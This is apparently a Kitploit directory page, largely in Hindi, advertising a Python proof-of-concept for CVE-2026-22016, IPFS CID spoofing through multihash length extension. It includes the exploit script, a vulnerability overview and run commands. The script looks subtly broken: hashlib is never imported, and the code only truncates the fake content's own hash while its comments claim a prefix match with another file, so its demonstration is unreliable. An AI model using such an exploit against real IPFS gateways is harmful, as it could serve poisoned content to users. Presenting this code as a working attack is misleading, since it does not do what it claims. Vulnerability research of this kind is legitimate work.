Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — Python प्रूफ-ऑफ-कॉन्सेप्ट जो मल्टीहैश लंबाई विस्तार के माध्यम से IPFS CID स्पूफिंग का प्रदर्शन करता है, जो सामग्री-एड्रेसिंग सत्यापन दोषों को उजागर करता है जो IPFS गेटवे को दूषित कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
भेद्यता विश्लेषणशोषणहैश विश्लेषणवेब सुरक्षाक्रिप्टोग्राफीप्रतिकूल हमला
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

Python प्रूफ-ऑफ-कॉन्सेप्ट जो मल्टीहैश लंबाई विस्तार के माध्यम से IPFS CID स्पूफिंग का प्रदर्शन करता है, जो सामग्री-एड्रेसिंग सत्यापन दोषों को उजागर करता है जो IPFS गेटवे को दूषित कर सकते हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
15 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-22016 – Multihash लंबाई विस्तार के माध्यम से IPFS CID स्पूफिंग

प्रोग्राम कोड (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – Multihash लंबाई विस्तार के माध्यम से IPFS CID स्पूफिंग

Severity: High

अवलोकन

एक IPFS इम्प्लीमेंटेशन CID के मल्टीहैश में length फ़ील्ड पर भरोसा करता है, बिना यह सत्यापित किए कि हैश स्वयं पूरी सामग्री से मेल खाता है। एक हमलावर ऐसी फ़ाइल बना सकता है जिसका ट्रंकेटेड हैश किसी वैध फ़ाइल के हैश के प्रीफ़िक्स के बराबर हो, और दुर्भावनापूर्ण फ़ाइल को उसी CID के अंतर्गत सर्व कर सकता है।

भेद्यता विवरण

  • प्रकार: Content Spoofing
  • प्रभाव: दुर्भावनापूर्ण सामग्री सर्व करना, IPFS गेटवे को पॉइज़न करना।
  • मूल कारण: CID सत्यापन यह जाँच नहीं करता कि डाइजेस्ट की लंबाई हैश फ़ंक्शन के अपेक्षित आउटपुट से मेल खाती है।

शोषण प्रदर्शन

स्क्रिप्ट चलाएँ:

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

यह दर्शाता है कि एक स्पूफ किया गया CID उत्पन्न किया जा सकता है।

टूल डाउनलोड करें